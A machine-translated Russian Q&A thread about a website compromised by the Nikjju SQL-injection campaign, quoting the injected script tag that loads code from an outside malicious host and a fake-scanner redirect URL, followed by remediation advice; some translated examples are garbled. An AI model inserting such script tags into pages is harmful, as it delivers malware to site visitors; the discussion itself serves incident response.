Очень сложно найти вредоносную строку JS: </ title><script src = http: //hgbyju.com/r.php></ script>

Когда я захожу на сайт из Chrome, ничего не происходит. Но когда я захожу на него из Firefox, ссылка на скрипт не возвращает статус 404. Существует вредоносный скрипт, который перенаправляет меня на "YouTube" с видео Эммы Уотсон.

Это случилось только один раз. Во второй раз снова 404. Я постараюсь воспроизвести его с другого IP-адреса.

Вот где меня перенаправили:

http://www1.thebest-scanerjjn.it.cx/o9gzj2z?2nvq3n=Vtfn5per7tvJzNjp1VPozMWrmqicnZSi19quZpTVysfUosXIeJnP1KuXppuQ3aWr7edqlNbRyZ%2FH0rpzmdLQ36Ld09jkpOOc1JaruLOLy9WwrF2hmZSclqKhmJ9jopzkp8%2Fo3diflpnrltegl6eL5t7Wq2ufpqaYoqadl5KWmeigsJSUoZmrnJ%2BjZJ%2Bc1aLb1dHTn9zq62Ch1sLUyuLU2NOm5eXjnpzX19KI1NTZm%2Bugw9zH6eOQ4JfUs9mn4uSNmKOKpbpSpanRz9HTzc%2FRmtPj2pbP4NuTxdSh6ZiYlaeS

Не ходи туда. Есть исполняемый файл, который пытается загрузить, и кто знает что еще.

Таким образом, скрипт работает, он не всегда возвращает 404. Вам следует серьезно проверить безопасность своего сайта после удаления вредоносной ссылки.

• Изменить все пароли;
• Если вы используете CMS, обновите его до последней версии;
• Если это саморазвитый веб-сайт, проверьте его на наличие SQL-инъекций и других видов нарушений безопасности.

Без дополнительной информации я бы предположил, что самая простая причина - самая простая: ваши пароли были скомпрометированы, а злоумышленник изменил ваш скрипт напрямую.

• Исправьте страницу / скрипт с этой строкой в ​​нем. Это может означать перезагрузку всего сайта из чистой копии, просто чтобы быть в безопасности - и у злоумышленника может быть скрипт, который изменяет файлы на лету.
• Измените все ваши пароли администратора, используя надежные пароли.

[Я всегда использовал надежные пароли, но по крайней мере один сайт использовался в качестве файлового сервера. Злоумышленник ничего не изменил, но мог бы. Удаление их контента и изменение паролей, кажется, исправили это на данный момент.]

Вместо поиска открытого текста, вы должны искать объекты HTML в десятичном и шестнадцатеричном виде.

Например:

script является шестнадцатеричным для script

<> является шестнадцатеричным для <>

Если вы используете WebForms с.NET 3.5 и неправильно очищаете входные строки, существует большая вероятность внедрения скрипта. Если вы отключили проверку запросов на какой-либо странице, вам следует проверить эти страницы на наличие альтернативных входных данных, подобных этим.

Лично я бы посмотрел на все управляемые данными входы на ваших зараженных страницах и просканировал эти данные на наличие html-сущностей, а не только обычных слов, таких как eval а также script,

редактировать: HTML-сущность всегда должна начинаться с &#, что должно облегчить поиск, чем поиск ключевых слов в шестнадцатеричном, десятичном, юникоде и т. д.

Может ли быть так, что хостинг-провайдер как-то заражен? Мы на платформе общего хостинга, однако хост довольно большой и заслуживающий уважения.

Прочтите диагностику вредоносного ПО Chrome для своего сайта. Если вы щелкнете по ссылке в диагностике на AS15418 (FASTHOSTS), она покажет, что на хостинге есть много зараженных сайтов:

Что произошло, когда Google посетил сайты, размещенные в этой сети?

Из 45254 сайтов, которые мы протестировали в этой сети за последние 90 дней, 885 сайтов, включая, например, lalydesign.co.uk/, consolegaming.eu/, nimbiz.com/, предоставили контент, который привел к при загрузке и установке вредоносного программного обеспечения без согласия пользователя.

Последний раз Google проверял сайт в этой сети 2012-04-23, а последний раз подозрительный контент был обнаружен 2012-04-23.

...

Размещены ли в этой сети сайты, распространяющие вредоносное ПО?

Да, в этой сети размещались сайты, которые распространяли вредоносное ПО за последние 90 дней. Мы нашли 35 сайтов, в том числе, например, hipsxpress.co.uk/, qpscars.co.uk/, aroundbritain.co.uk/, которые заразили 58 других сайтов, включая, например, meb.gov.tr/, opes.go.th/, stephenbrowning.co.uk/.

Я думаю, вы должны оказать на них давление (изменить), чтобы устранить проблемы с безопасностью или изменить услуги хостинга.

Многие сайты были скомпрометированы этой атакой. Киберпреступники, нацеленные на уязвимые сайты ASP.

Хакеры внедрили этот код в ваш сайт, используя уязвимость SQL Injection на вашем сайте.

Советы по безопасности:

• Анализируя код: проверьте исходный код всех страниц вашего сайта. Не просто ищите скрипт, читайте каждую строчку. Найдите подозрительный код и удалите его (убедитесь, что это не ваш код). Примечание: некоторые сценарии могут быть закодированы, поэтому внимательно проверьте код.

• Файлы в вашем каталоге: Проверьте наличие подозрительных файлов в вашем хостинг-каталоге.

• Исправьте уязвимость: хакеры внедрили этот код, используя уязвимость SQLi. Поэтому постарайтесь найти уязвимую часть на вашем сайте и исправить ее. Если вы не знаете, как это сделать, то нанять эксперта по безопасности. Также вы можете использовать некоторые автоматические сканеры sqli, чтобы найти уязвимость (но она не на 100% точна).

• Смена пароля. После того, как вы исправите уязвимость, измените пароль вашего хостинга, ftp, mysql. Если вы используете такой же пароль где-либо еще, измените их также.

Информация: вышеупомянутая инъекция широко известна как атака Nikjju. Подробности можно найти здесь: Атака Nikjju Sql и вредоносные домены.